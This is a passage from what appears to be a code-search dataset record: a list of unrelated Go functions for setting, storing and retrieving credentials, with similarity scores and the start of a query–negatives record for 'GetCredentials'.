credentials.NewEnvCredentials()\n\tsetCreds, _ := envCreds.Get()\n\t// error apparently does not return if environment variables weren't set\n\t// so check what was set and look for empty strings, don't want to set empty creds\n\tif setCreds.AccessKeyID != \"\" && setCreds.SecretAccessKey != \"\" {\n\t\tcreds = envCreds\n\t}\n\n\t// Last, if credentials were passed via CLI, always prefer those\n\tif cfg.AWS.AccessKeyID != \"\" && cfg.AWS.SecretAccessKey != \"\" {\n\t\tcreds = credentials.NewStaticCredentials(cfg.AWS.AccessKeyID, cfg.AWS.SecretAccessKey, \"\")\n\t}\n\n\treturn creds\n}", "func (me *ConfigData) SetAuthenticationCredentials(aUsername, aPassword string) {\n\tme.Username = aUsername\n\tme.Password = aPassword\n}", "func (a *AdminClient) SetSaslCredentials(username, password string) error {\n\terr := a.verifyClient()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn setSaslCredentials(a.handle.rk, username, password)\n}", "func (in *Credentials) DeepCopy() *Credentials {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Credentials)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func SaveCredentials(url, username, password string) error {\n\n\tcreds := &Credentials{\n\t\tServerURL: url,\n\t\tUsername: username,\n\t\tSecret: password,\n\t}\n\n\treturn CurrentHelper.Add(creds)\n}", "func (d *Direct) AddCredentials(creds map[string]string) {\n\td.credentials = make(map[string]string)\n\tfor key, value := range creds {\n\t\td.credentials[key] = value\n\t}\n}", "func NewCredentials() *Credentials {\n\t// TODO savefile\n\treturn &Credentials{users: map[string]string{}}\n}", "func (d *Disco) SetCredentialsSource(src auth.CredentialsSource) {\n\td.credsSrc = src\n}", "func (k *Kluster) Credentials(params ...string) {\n\t// DEBUG:\n\t// k.ui.Log.Debugf(\"credentials to assign to platform %s. (%v)\", k.Platform(), params)\n\tk.provisioner[k.Platform()].Credentials(params...)\n}", "func WithCredentials(credentials credentials.TransportCredentials) Option {\n\treturn func(o *options) {\n\t\to.credentials = credentials\n\t}\n}", "func (s CredentialStore) SetPassword(c context.Context, password string, tokenUUID string) error {\n\ttstore := newTokenStore()\n\tt, err := tstore.Get(c, tokenUUID)\n\tif err != nil {\n\t\treturn errors.New(\"invalid token\")\n\t}\n\tif t.Expiry.Before(time.Now()) {\n\t\treturn errors.New(\"token is expired\")\n\t}\n\taccountKey := t.Key.Parent()\n\n\tvar creds []*Credentials\n\tkeys, err := datastore.NewQuery(s.TableName).\n\t\tAncestor(accountKey).\n\t\tFilter(\"ProviderID =\", \"\").\n\t\tGetAll(c, &creds)\n\n\tif err != nil {\n\t\treturn err\n\t}\n\tif len(keys) == 0 {\n\t\treturn ErrNoCredentialsFound\n\t}\n\tif len(keys) > 1 {\n\t\treturn ErrMultipleCredentialsFound\n\t}\n\tkey, cred := keys[0], creds[0]\n\tcred.Password, err = encrypt(password)\n\tif err != nil {\n\t\treturn errors.New(\"failed to encrypt password\")\n\t}\n\n\tif err := tstore.Delete(c, tokenUUID); err != nil {\n\t\treturn errors.New(\"failed to delete token\")\n\t}\n\n\treturn s.Update(c, key, cred)\n}", "func (ec *ExtensionClient) UpdateCredentials(credentials *extension.ExtensionCredentials) (res *extension.ExtensionCredentials, err error) {\n\n\tresponse, err := ec.c.UpdateCredentials()(context.Background(), credentials)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn response.(*extension.ExtensionCredentials), nil\n}", "func NewCredentials(values map[string]string) *Credentials {\n\treturn &Credentials{\n\t\tServicePrincipal: ServicePrincipal{\n\t\t\tClientID: values[secrettype.AzureClientID],\n\t\t\tClientSecret: values[secrettype.AzureClientSecret],\n\t\t\tTenantID: values[secrettype.AzureTenantID],\n\t\t},\n\t\tSubscriptionID: values[secrettype.AzureSubscriptionID],\n\t}\n}", "func (c *client) SetUsernameAndPassword(username, password string) error {\n\tif !c.isValid() {\n\t\treturn &NotValidError{}\n\t}\n\tif username == \"\" {\n\t\treturn errors.New(\"invalid username\")\n\t}\n\tif password == \"\" {\n\t\treturn errors.New(\"invalid password\")\n\t}\n\tc.username = username\n\tc.password = password\n\tc.useAuth = true\n\treturn nil\n}", "func WithCredentials(username, password string) ClientOption {\n\treturn func(c *Client) error {\n\t\tif c.authHandler == nil {\n\t\t\tc.authHandler = defaultHandler()\n\t\t}\n\n\t\tc.authHandler.username = username\n\t\tc.authHandler.password = password\n\t\treturn nil\n\t}\n}", "func (c *Cmd) WithCredentials(cr *Credentials) *Cmd {\n\tres := c.Clone()\n\tres.Vars[envPrincipal] = cr.Handle\n\treturn res\n}", "func ChangeCredentials(userID, username, password string) (err error) {\n err = checkInit()\n if err != nil {\n return\n }\n\n err = createError(032)\n\n if userData, ok := data[\"users\"].(map[string]interface{})[userID]; ok {\n //var userData = tmp.(map[string]interface{})\n var salt = userData.(map[string]interface{})[\"_salt\"].(string)\n\n if len(username) > 0 {\n userData.(map[string]interface{})[\"_username\"] = SHA256(username, salt)\n }\n\n if len(password) > 0 {\n userData.(map[string]interface{})[\"_password\"] = SHA256(password, salt)\n }\n\n err = saveDatabase(data)\n }\n\n return\n}", "func NewCredentials(username string, password string, domain string) *Credentials {\n\tcredentials := Credentials{\n\t\tUsername: username,\n\t\tPassword: password,\n\t\tDomain: domain,\n\t}\n\treturn &credentials\n}", "func setServerCredentials(t *testing.T, p *KeyMgrBasedProvider, name string, caKey crypto.PrivateKey, caCert *x509.Certificate) (crypto.PrivateKey, *x509.Certificate) {\n\tkey, err := p.CreateServerKeyPair(name, keymgr.ECDSA256)\n\tAssertOk(t, err, \"Error creating server keypair\")\n\tcert := getCert(t, name, key, caKey, caCert)\n\terr = p.SetServerCertificate(name, cert)\n\tAssertOk(t, err, \"Error setting server certificate\")\n\treturn key, cert\n}", "func (m *Application) SetFederatedIdentityCredentials(value []FederatedIdentityCredentialable)() {\n m.federatedIdentityCredentials = value\n}", "func (c *S3Configuration) Credentials(accessKey, secretKey string) *S3Configuration {\n\tc.accessKey = accessKey\n\tc.secretKey = secretKey\n\treturn c\n}", "func NewMockCredentials(ctrl *gomock.Controller) *MockCredentials {\n\tmock := &MockCredentials{ctrl: ctrl}\n\tmock.recorder = &MockCredentialsMockRecorder{mock}\n\treturn mock\n}", "func (k *Kluster) SaveCredentials(params ...string) error {\n\tpath := filepath.Join(k.Dir(), CredentialsFileName)\n\tcred := NewCredentials(k.Name, k.Platform(), path)\n\n\tif len(params) != 3 {\n\t\tif err := cred.Getenv(true); err != nil {\n\t\t\treturn err\n\t\t}\n\t\tparams = cred.parameters()\n\t}\n\n\tcred.SetParameters(params...)\n\n\tk.ui.Log.Debugf(\"saving credentials to cluster %s\", k.Name)\n\treturn cred.Write()\n}", "func TestCredentials(t *testing.T) {\n\trand.Seed(time.Now().UTC().UnixNano())\n\n\t// create new creds\n\tvar creds, form = GenUser()\n\tif len(creds.Key) == 0 || len(creds.Value) == 0 {\n\t\tt.Errorf(\"Error getting new user credentials\")\n\t}\n\n\t// try create a new user without specifying current credentials\n\tr := PostRequest(\"\", form, s.CredentialHandler)\n\tvar nocreds Credentials\n\t_ = json.Unmarshal(r.Body.Bytes(), &nocreds)\n\tif len(nocreds.Value) != 0 || len(nocreds.Key) != 0 {\n\t\tt.Errorf(\"Shouldn't have been able to generate new creds for user! %v\", nocreds)\n\t}\n\n\t// ask for new Credentials for user\n\tform.Add(\"current_credentials\", creds.Value)\n\tform.Add(\"current_key\", creds.Key)\n\tr = PostRequest(\"\", form, s.CredentialHandler)\n\tvar newcreds Credentials\n\t_ = json.Unmarshal(r.Body.Bytes(), &newcreds)\n\tif len(newcreds.Value) == 0 || creds.Value == newcreds.Value {\n\t\tt.Errorf(\"Error fetching new credentials for user\")\n\t}\n}", "func NewCredentialSet(namespace string, name string, creds ...secrets.SourceMap) CredentialSet {\n\tnow := time.Now()\n\tcs := CredentialSet{\n\t\tCredentialSetSpec: CredentialSetSpec{\n\t\t\tSchemaType: SchemaTypeCredentialSet,\n\t\t\tSchemaVersion: DefaultCredentialSetSchemaVersion,\n\t\t\tName: name,\n\t\t\tNamespace: namespace,\n\t\t\tCredentials: creds,\n\t\t},\n\t\tStatus: CredentialSetStatus{\n\t\t\tCreated: now,\n\t\t\tModified: now,\n\t\t},\n\t}\n\n\treturn cs\n}", "func NewCredentials(service string) tushle.Credentials {\n\treturn &creds{\n\t\tservice: service,\n\t}\n}", "func (b *OAuthFlowsMutator) ClientCredentials(v OAuthFlow) *OAuthFlowsMutator {\n\tb.proxy.clientCredentials = v\n\treturn b\n}", "func setFakeCredentials() {\n\n\t// Start with an empty configuration file content structure\n\tcfg := ini.Empty()\n\n\t// Populate it with the basics\n\tdefaultSection, err := cfg.NewSection(mfile.DefaultSectionName)\n\tdefaultSection.NewKey(mfile.AccessKeyIDKey, fakeAccessKeyID)\n\tdefaultSection.NewKey(mfile.SecretAccessKeyKey, fakeSecretAccessKey)\n\tdefaultSection.NewKey(mfile.MfaDeviceIDKey, fakeMFADeviceID)\n\n\t// Write the file\n\terr = cfg.SaveTo(fakeCredentialsFilePath)\n\n\t// That really should not faile to wrote, but if it did abort the tests\n\t// cos nothing will work after this\n\tif err != nil {\n\t\tfmt.Printf(\"\\nFailed to write fake credentials: %s\\n\", err.Error())\n\t\tos.Exit(999)\n\t}\n\n\t// All looks good - trick the package into using the fake file we just wrote\n\tmfile.OverrideDefaultCredentialsFilepath(fakeCredentialsFilePath)\n}", "func updateCredentials() error {\n\t// Connect to the surrounding k8s cluster.\n\tlocalConfig, err := rest.InClusterConfig()\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\tlocalClient, err := kubernetes.NewForConfig(localConfig)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\t// Read the robot auth data from the corresponding k8s secret.\n\trobotAuth, err := robotauth.LoadFromK8sSecret(localClient)\n\tif k8serrors.IsNotFound(err) {\n\t\tlog.Printf(\"Warning: Robot auth secret not found. Not refreshing GCR \" +\n\t\t\t\"credentials... (this is only OK if the robot cluster is running \" +\n\t\t\t\"in the cloud).\")\n\t\treturn nil\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\t// Perform a token exchange with the TokenVendor in the cloud cluster and update the\n\t// credentials used to pull images from GCR.\n\treturn gcr.UpdateGcrCredentials(localClient, robotAuth)\n}", "func (b *BootstrapClient) WriteCredentialsEnv() *BootstrapClient {\n\tos.Setenv(vault.EnvVaultAppRoleCreds, string(b.credsJSON))\n\treturn b\n}", "func (c Client) ChangeAccountCredentials(accountID string, changeEntireGroup bool) error {\n\turl := fmt.Sprintf(\"%s/PasswordVault/API/Accounts/%s/Change\", c.BaseURL, accountID)\n\tbody := requests.ChangeAccountCredential{\n\t\tChangeEntireGroup: changeEntireGroup,\n\t}\n\tresponse, err := httpJson.Post(url, c.SessionToken, body, c.InsecureTLS, c.Logger)\n\tif err != nil {\n\t\treturnedError, _ := json.Marshal(response)\n\t\treturn fmt.Errorf(\"Failed to mark change on account '%s'. %s. %s\", accountID, string(returnedError), err)\n\t}\n\n\treturn nil\n}", "func SetAuthCookies(ctx echo.Context, tokenString string) error {\n\tparts := strings.Split(tokenString, \".\")\n\tif len(parts) != 3 {\n\t\treturn fmt.Errorf(\"failed to split token string\")\n\t}\n\tsignature := parts[2]\n\theaderPayload := strings.Join(parts[0:2], \".\")\n\tWriteSignatureCookie(ctx, signature)\n\tWriteHeaderPayloadCookie(ctx, headerPayload, DefaultCookiePayloadTimeout)\n\treturn nil\n}", "func WithCredentials(cert, key, ca string) Option {\n\treturn &credentialOption{cert, key, ca}\n}", "func (ctrler CtrlDefReactor) OnCredentialsUpdate(oldObj *Credentials, newObj *cluster.Credentials) error {\n\tlog.Info(\"OnCredentialsUpdate is not implemented\")\n\treturn nil\n}", "func (ct *ctrlerCtx) WatchCredentials(handler CredentialsHandler) error {\n\tkind := \"Credentials\"\n\n\t// see if we already have a watcher\n\tct.Lock()\n\t_, ok := ct.watchCancel[kind]\n\tct.Unlock()\n\tif ok {\n\t\treturn fmt.Errorf(\"Credentials watcher already exists\")\n\t}\n\n\t// save handler\n\tct.Lock()\n\tct.handlers[kind] = handler\n\tct.Unlock()\n\n\t// run Credentials watcher in a go routine\n\tct.runCredentialsWatcher()\n\n\treturn nil\n}", "func SetLicenseUserCredential(email string, password string) int {\n\tcEmail := goToCString(email)\n\tcPassword := goToCString(password)\n\tstatus := C.SetLicenseUserCredential(cEmail, cPassword)\n\tfreeCString(cEmail)\n\tfreeCString(cPassword)\n\treturn int(status)\n}", "func (d *domainClient) SetCookies(ctx context.Context, args *SetCookiesArgs) (err error) {\n\tif args != nil {\n\t\terr = rpcc.Invoke(ctx, \"Network.setCookies\", args, nil, d.conn)\n\t} else {\n\t\terr = rpcc.Invoke(ctx, \"Network.setCookies\", nil, nil, d.conn)\n\t}\n\tif err != nil {\n\t\terr = &internal.OpError{Domain: \"Network\", Op: \"SetCookies\", Err: err}\n\t}\n\treturn\n}", "func (dsc *DataSourceConfig) AddCredentials(cred *Credentials) error {\n\tif cred == nil || cred.Name == \"\" {\n\t\treturn fmt.Errorf(\"AddCredentials: The Credentials argument is invalid\")\n\t}\n\n\tif dsc.creds == nil {\n\t\tdsc.creds = make(map[string]*Credentials)\n\t}\n\n\tdsc.creds[cred.Name] = cred\n\treturn nil\n}", "func (b *OGame) SetOGameCredentials(username, password, otpSecret, bearerToken string) {\n\tb.Username = username\n\tb.password = password\n\tb.otpSecret = otpSecret\n\tb.bearerToken = bearerToken\n}", "func (a *CloudProviderCredentialsApiService) EditAWSCredentials(ctx _context.Context, organizationId string, credentialsId string) ApiEditAWSCredentialsRequest {\n\treturn ApiEditAWSCredentialsRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t\torganizationId: organizationId,\n\t\tcredentialsId: credentialsId,\n\t}\n}", "func (ctx *RequestContext) SetPrincipal(username string, user_id uint64, rights []string) {\n\tctx.principal = NewPrincipal(username, user_id, rights)\n}", "func Credentials(username, password string) ConfigOption {\n\treturn func(config configBuilder) {\n\t\tconfig(\"user\", username)\n\t\tconfig(\"password\", password)\n\t}\n}", "func (o *PostLolRsoAuthV1AuthorizationGasParams) SetCreds(creds *models.LolRsoAuthRSOPlayerCredentials) {\n\to.Creds = creds\n}", "func setClientCredentials(t *testing.T, p *KeyMgrBasedProvider, caKey crypto.PrivateKey, caCert *x509.Certificate) (crypto.PrivateKey, *x509.Certificate) {\n\tkey, err := p.CreateClientKeyPair(keymgr.ECDSA256)\n\tAssertOk(t, err, \"Error creating client keypair\")\n\tcert := getCert(t, \"client\", key, caKey, caCert)\n\terr = p.SetClientCertificate(cert)\n\tAssertOk(t, err, \"Error setting server certificate\")\n\treturn key, cert\n}", "func (s *Passwords) Set(a interface{}, password string) error {\n\t// generate a salt\n\tsalt, err := s.Config.GenSalt()\n\tif err != nil {\n\t\treturn err\n\t}\n\t// compute derived key which we call \"hash\"\n\thash, err := s.Config.HashPassword([]byte(password), salt)\n\tif err != nil {\n\t\treturn err\n\t}\n\t// encode config, salt and hash\n\tdata := s.Config.Encode(salt, hash)\n\treturn s.SetAccountPasswordData(a, data)\n}", "func (rt *RestTester) ReplacePerBucketCredentials(config base.PerBucketCredentialsConfig) {\n\trt.ServerContext().Config.BucketCredentials = config\n\t// Update the CouchbaseCluster to include the new bucket credentials\n\tcouchbaseCluster, err := CreateCouchbaseClusterFromStartupConfig(rt.ServerContext().Config, base.PerUseClusterConnections)\n\trequire.NoError(rt.TB, err)\n\trt.ServerContext().BootstrapContext.Connection = couchbaseCluster\n}", "func ExecSet() {\n\n\tvar identifier string\n\ti := 1\n\tif i+1 < len(os.Args) {\n\t\tidentifier = os.Args[i+1]\n\t}\n\n\tcredentialsPath := fmt.Sprintf(\"%s/git-credentials.json\", utils.GetHomeDir())\n\n\tif utils.FileExists(credentialsPath) {\n\n\t\tvar currentUser models.User\n\n\t\tfilePath := fmt.Sprintf(\"%s/.git-credentials\", utils.GetHomeDir())\n\n\t\tjsonFile, err := os.Open(fmt.Sprintf(\"%s/git-credentials.json\", utils.GetHomeDir()))\n\n\t\tutils.Check(err)\n\n\t\tdefer jsonFile.Close()\n\n\t\tvar users collections.Users\n\n\t\tbyteValue, _ := ioutil.ReadAll(jsonFile)\n\n\t\tjson.Unmarshal(byteValue, &users)\n\n\t\tif identifier != \"\" {\n\t\t\texists := users.Contains(identifier)\n\t\t\tif exists {\n\t\t\t\tcurrentUser = users.Get(identifier)\n\t\t\t} else {\n\t\t\t\tfmt.Println(fmt.Sprintf(\"%s: credentials do not exist\", identifier))\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Println(\"User identifier not set.\\nDefine it with the s (set) command.\")\n\t\t\treturn\n\t\t}\n\n\t\tcredentials := fmt.Sprintf(\"https://%s:%s@%s\\n\", url.QueryEscape(currentUser.Credentials.Username), url.QueryEscape(currentUser.Credentials.Password), currentUser.Credentials.Domain)\n\n\t\tfile, err := os.Create(filePath)\n\t\tutils.Check(err)\n\t\tdefer file.Close()\n\n\t\tw := bufio.NewWriter(file)\n\t\t_, err = w.WriteString(credentials)\n\t\tutils.Check(err)\n\t\tw.Flush()\n\t\treturn\n\t}\n\tfmt.Println(\"git-credentials.json file does not exists.\\nGenerate it with the i (init) command.\")\n}", "func (m *AddPasswordPostRequestBody) SetPasswordCredential(value iadcd81124412c61e647227ecfc4449d8bba17de0380ddda76f641a29edf2b242.PasswordCredentialable)() {\n m.passwordCredential = value\n}", "func Credentials(addr, username, password string) InfluxReporterFunc {\n\treturn func(c *InfluxReporter) {\n\t\tc.addr = addr\n\t\tc.username = username\n\t\tc.password = password\n\t}\n}", "func CreateCredentials(c *Credentials) error {\n\trow, cancel, err := db.ConnManager.QueryRow(sqlCredentialCreate, c.Login, c.Password, c.Site.Id)\n\tif err != nil {\n\t\tif err == db.ErrNothingDone {\n\t\t\treturn ErrCredentialsNotFound\n\t\t}\n\t\treturn err\n\t}\n\tdefer cancel()\n\tif err := row.Scan(&c.Id); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (expDetails *ExperimentDetails) SetSecrets(clients ClientSets, engineDetails EngineDetails) error {\n\texperimentSecrets, err := getExperimentSecrets(clients, expDetails)\n\tif err != nil {\n\t\treturn err\n\t}\n\tengineSecrets, err := getEngineSecrets(clients, engineDetails, expDetails)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Overriding the Secrets from the ChaosEngine\n\tOverridingSecrets(experimentSecrets, engineSecrets, expDetails)\n\n\treturn nil\n}", "func (p *MockPeer) SetRoles(roles []string) {\r\n\tp.MockRoles = roles\r\n}", "func Credentials(ctx context.Context, scopes ...string) *google.Credentials {\n\treturn CredentialsEnv(ctx, envPrivateKey, scopes...)\n}", "func NewSetCredentialCmd(\n\tcredSetter credential.Setter,\n\tcredFile credential.ReaderWriterPather,\n\tfile stream.FileReadExister,\n\tinText prompt.InputText,\n\tinBool prompt.InputBool,\n\tinList prompt.InputList,\n\tinPass prompt.InputPassword,\n) *cobra.Command {\n\ts := &setCredentialCmd{\n\t\tSetter: credSetter,\n\t\tReaderWriterPather: credFile,\n\t\tFileReadExister: file,\n\t\tInputText: inText,\n\t\tInputBool: inBool,\n\t\tInputList: inList,\n\t\tInputPassword: inPass,\n\t}\n\n\tcmd := &cobra.Command{\n\t\tUse: \"credential\",\n\t\tShort: \"Set credential\",\n\t\tLong: `Set credentials for Github, Gitlab, AWS, UserPass, etc.`,\n\t\tRunE: RunFuncE(s.runStdin(), s.runPrompt()),\n\t\tValidArgs: []string{\"\"},\n\t\tArgs: cobra.OnlyValidArgs,\n\t}\n\tcmd.LocalFlags()\n\treturn cmd\n}", "func WithCredentials(with string) wrapping.Option {\n\treturn func() interface{} {\n\t\treturn OptionFunc(func(o *options) error {\n\t\t\to.withCredentials = with\n\t\t\treturn nil\n\t\t})\n\t}\n}", "func SetFields(c context.Context, fields Fields) context.Context {\n\treturn context.WithValue(c, fieldsKey, fields)\n}", "func DeployCredentialsToContext(ctx context.Context, creds *Credentials) context.Context {\n\tflag, store := creds.getInternal()\n\treturn context.WithValue(ctx, flag, store)\n}", "func DeployCredentialsToContext(ctx context.Context, creds *Credentials) context.Context {\n\tflag, store := creds.getInternal()\n\treturn context.WithValue(ctx, flag, store)\n}", "func SelectCredentials(creds string, profile string) (*credentials.Credentials, error) {\n\tsharedCredsFile := os.Getenv(\"HOME\") + SHARED_CREDS_FILENAME\n\tswitch creds {\n\tcase \"env\":\n\t\treturn credentials.NewEnvCredentials(), nil\n\tcase \"shared\":\n\t\treturn credentials.NewSharedCredentials(sharedCredsFile, profile), nil\n\tcase \"ec2\":\n\t\treturn credentials.NewCredentials(&ec2rolecreds.EC2RoleProvider{\n\t\t\tClient: ec2metadata.New(session.New()),\n\t\t}), nil\n\tcase \"\":\n\n\t\tproviders := []credentials.Provider{\n\t\t\t&credentials.EnvProvider{},\n\t\t\t&credentials.SharedCredentialsProvider{\n\t\t\t\tFilename: sharedCredsFile,\n\t\t\t\tProfile: profile,\n\t\t\t},\n\t\t\t&ec2rolecreds.EC2RoleProvider{\n\t\t\t\tClient: ec2metadata.New(session.New()),\n\t\t\t}}\n\t\treturn credentials.NewChainCredentials(providers), nil\n\tdefault:\n\t\treturn nil, errors.New(\"Unknown creds name: \" + creds)\n\t}\n}", "func (p *MockPeer) SetRoles(roles []string) {\n\tp.MockRoles = roles\n}", "func (a *Extractor) WithCredentials(handler khttp.FuncHandler) khttp.FuncHandler {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tcreds, err := a.GetCredentialsFromRequest(r)\n\t\tif creds != nil && err == nil {\n\t\t\tr = r.WithContext(SetCredentials(r.Context(), creds))\n\t\t}\n\t\thandler(w, r)\n\t}\n}", "func (b *BootstrapClient) WriteCredentialsFile(path string) *BootstrapClient {\n\tif err := ioutil.WriteFile(path, b.credsJSON, 0644); err != nil {\n\t\tpanic(fmt.Errorf(\"Failed to write credentials to file at %s. Error: %v\", path, err))\n\t}\n\treturn b\n}", "func (p *TempCredentialsProvider) Credentials() (*aws.Credentials, error) {\n\tif time.Now().After(p.nextRefresh) {\n\t\terr := p.Refresh()\n\t\tif err != nil {\n\t\t\t// Retry next time around - don't wait for p.Duration to elapse.\n\t\t\tlog.Printf(\"TempCredentialsProvider failed to refresh credentials: %s\\n\", err)\n\t\t\treturn nil, err\n\t\t}\n\n\t\t// Schedule next refresh 5 minutes before the credentials are due to expire.\n\t\tp.nextRefresh = time.Now().Add(p.Duration - (5 * time.Minute))\n\t}\n\n\t// Transpose the temporary sts.Credentials into aws.Credentials.\n\treturn &aws.Credentials{\n\t\tAccessKeyID: *p.role.Credentials.AccessKeyID,\n\t\tSecretAccessKey: *p.role.Credentials.SecretAccessKey,\n\t\tSessionToken: *p.role.Credentials.SessionToken,\n\t}, nil\n}", "func (f *Forwarder) saveClientCreds(ctx authContext, c *tls.Config) error {\n\tf.mu.Lock()\n\tdefer f.mu.Unlock()\n\treturn f.clientCredentials.Set(ctx.key(), c, ctx.sessionTTL)\n}", "func InitCredentials(options ...func(*CredentialsFile) error) {\n\tInitCredentialsFile()\n\n\tfor _, option := range options {\n\t\toption(Creds)\n\t}\n\n\t// Register auth management commands to create and list profiles.\n\tcmd := &cobra.Command{\n\t\tUse: \"auth\",\n\t\tShort: \"Authentication settings\",\n\t}\n\tRoot.AddCommand(cmd)\n\n\tuse := \"add-profile [flags] <name>\"\n\tfor _, name := range Creds.keys {\n\t\tuse += \" <\" + strings.Replace(name, \"_\", \"-\", -1) + \">\"\n\t}\n\n\tcmd.AddCommand(&cobra.Command{\n\t\tUse: use,\n\t\tAliases: []string{\"add\"},\n\t\tShort: \"Add a new named authentication profile\",\n\t\tArgs: cobra.ExactArgs(1 + len(Creds.keys)),\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tfor i, key := range Creds.keys {\n\t\t\t\t// Replace periods in the name since Viper will create nested structures\n\t\t\t\t// in the config and this isn't what we want!\n\t\t\t\tname := strings.Replace(args[0], \".\", \"-\", -1)\n\t\t\t\tCreds.Set(\"profiles.\"+name+\".\"+strings.Replace(key, \"-\", \"_\", -1), args[i+1])\n\t\t\t}\n\n\t\t\tfilename := path.Join(viper.GetString(\"config-directory\"), \"credentials.json\")\n\t\t\tif err := Creds.WriteConfigAs(filename); err != nil {\n\t\t\t\tpanic(err)\n\t\t\t}\n\t\t},\n\t})\n\n\tcmd.AddCommand(&cobra.Command{\n\t\tUse: \"list-profiles\",\n\t\tAliases: []string{\"ls\"},\n\t\tShort: \"List available configured authentication profiles\",\n\t\tArgs: cobra.NoArgs,\n\t\tRun: func(cmd *cobra.Command, args []string) {\n\t\t\tprofiles := Creds.GetStringMap(\"profiles\")\n\t\t\tif profiles != nil {\n\t\t\t\ttable := tablewriter.NewWriter(os.Stdout)\n\t\t\t\ttable.SetHeader(append([]string{\"Profile Name\"}, Creds.listKeys...))\n\n\t\t\t\tfor name, profile := range profiles {\n\t\t\t\t\trow := []string{name}\n\t\t\t\t\tfor _, key := range Creds.listKeys {\n\t\t\t\t\t\trow = append(row, profile.(map[string]interface{})[strings.Replace(key, \"-\", \"_\", -1)].(string))\n\t\t\t\t\t}\n\t\t\t\t\ttable.Append(row)\n\t\t\t\t}\n\t\t\t\ttable.Render()\n\t\t\t} else {\n\t\t\t\tfmt.Printf(\"No profiles configured. Use `%s auth add-profile` to add one.\\n\", Root.CommandPath())\n\t\t\t}\n\t\t},\n\t})\n}", "func Set(key string, val string, acc *tk.Account) {\n\tif acc != nil {\n\t\taccKeys[acc.Username] = append(accKeys[acc.Username], key)\n\t}\n\tclient.Set(key, val, DefaultExpiration)\n}", "func WithTransportCredentials(creds credentials.TransportCredentials) Option {\n\treturn func(p *proxy) {\n\t\tp.creds = creds\n\t}\n}", "func (o *ListHetznerSizesParams) SetCredential(credential *string) {\n\to.Credential = credential\n}", "func (ch challenge) SetHeaders(r *http.Request, w http.ResponseWriter) {\n\tw.Header().Set(\"WWW-Authenticate\", fmt.Sprintf(\"Basic realm=%q\", ch.realm))\n}", "func (ch challenge) SetHeaders(r *http.Request, w http.ResponseWriter) {\n\tw.Header().Set(\"WWW-Authenticate\", fmt.Sprintf(\"Basic realm=%q\", ch.realm))\n}", "func (c *Config) WithCredentials(credentials *Credentials) *Config {\n\tc.Credentials = credentials\n\treturn c\n}" ]
[ "0.82418156", "0.80860937", "0.7883892", "0.7844481", "0.7842754", "0.78402686", "0.7820282", "0.7771781", "0.7449602", "0.7333821", "0.73264146", "0.72656095", "0.72490543", "0.71931434", "0.7156642", "0.67167217", "0.67162615", "0.6636944", "0.6633464", "0.6582207", "0.65579873", "0.6538196", "0.65376145", "0.65054756", "0.6485689", "0.64555377", "0.643539", "0.63149077", "0.6296873", "0.6284185", "0.62803507", "0.6247329", "0.594223", "0.59281355", "0.5814854", "0.5812428", "0.57977617", "0.5792854", "0.5783892", "0.5769673", "0.57692283", "0.57496774", "0.5736748", "0.5729818", "0.57234466", "0.5646132", "0.5632185", "0.56222796", "0.55396575", "0.5528164", "0.551875", "0.54851425", "0.54821384", "0.54802895", "0.5444794", "0.5411923", "0.539111", "0.53591967", "0.53579426", "0.53551894", "0.53530884", "0.53273094", "0.52957547", "0.529503", "0.5283571", "0.52759296", "0.5263896", "0.5256609", "0.5255972", "0.52478856", "0.5235225", "0.5233671", "0.52291554", "0.5216699", "0.52001125", "0.5193158", "0.51684266", "0.5168033", "0.5159358", "0.5159301", "0.51579803", "0.5145684", "0.51378286", "0.51283926", "0.51262164", "0.51197565", "0.51197565", "0.51085466", "0.50830334", "0.5080549", "0.5063428", "0.5062181", "0.5061631", "0.5056315", "0.50469595", "0.50431406", "0.50331706", "0.50315505", "0.50315505", "0.5029153" ]
0.6853925
15
GetCredentials get current credentials.
func (s serverConfigV14) GetCredential() credential { serverConfigMu.RLock() defer serverConfigMu.RUnlock() return s.Credential }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func GetCredentials(parameters *ClientParameters) *Credentials {\n\treturn getCredentials(parameters)\n}", "func (m *Manager) GetCredentials() map[string]interface{} {\n\treturn map[string]interface{}{\"user\": m.user.User, \"pass\": m.user.Pass}\n}", "func (c *Client) GetCredentials(host string) (*Credentials, error) {\n\tvar stdout bytes.Buffer\n\n\tvar stderr bytes.Buffer\n\n\t// TODO: handle session expired error\n\tcmd := exec.Command(\"op\", \"--cache\", \"--session\", c.token, \"get\", \"item\", host) // nolint:gosec // TODO: validate\n\tcmd.Stdout = &stdout\n\tcmd.Stderr = &stderr\n\n\tif err := cmd.Run(); err != nil {\n\t\treturn nil, errors.New(stderr.String()) // nolint:goerr113 // TODO: refactor\n\t}\n\n\tvar res response\n\tif err := json.Unmarshal(stdout.Bytes(), &res); err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar username string\n\n\tvar password string\n\n\tfor _, field := range res.Details.Fields {\n\t\tif field.Name == \"username\" {\n\t\t\tusername = field.Value\n\t\t}\n\n\t\tif field.Name == \"password\" {\n\t\t\tpassword = field.Value\n\t\t}\n\t}\n\n\treturn &Credentials{\n\t\tUsername: username,\n\t\tPassword: password,\n\t}, nil\n}", "func (c *Client) GetCredentials(ctx context.Context, params *GetCredentialsInput, optFns ...func(*Options)) (*GetCredentialsOutput, error) {\n\tif params == nil {\n\t\tparams = &GetCredentialsInput{}\n\t}\n\n\tresult, metadata, err := c.invokeOperation(ctx, \"GetCredentials\", params, optFns, c.addOperationGetCredentialsMiddlewares)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tout := result.(*GetCredentialsOutput)\n\tout.ResultMetadata = metadata\n\treturn out, nil\n}", "func GetCredentials(ctx context.Context) *CredentialsCookie {\n\tcreds, _ := 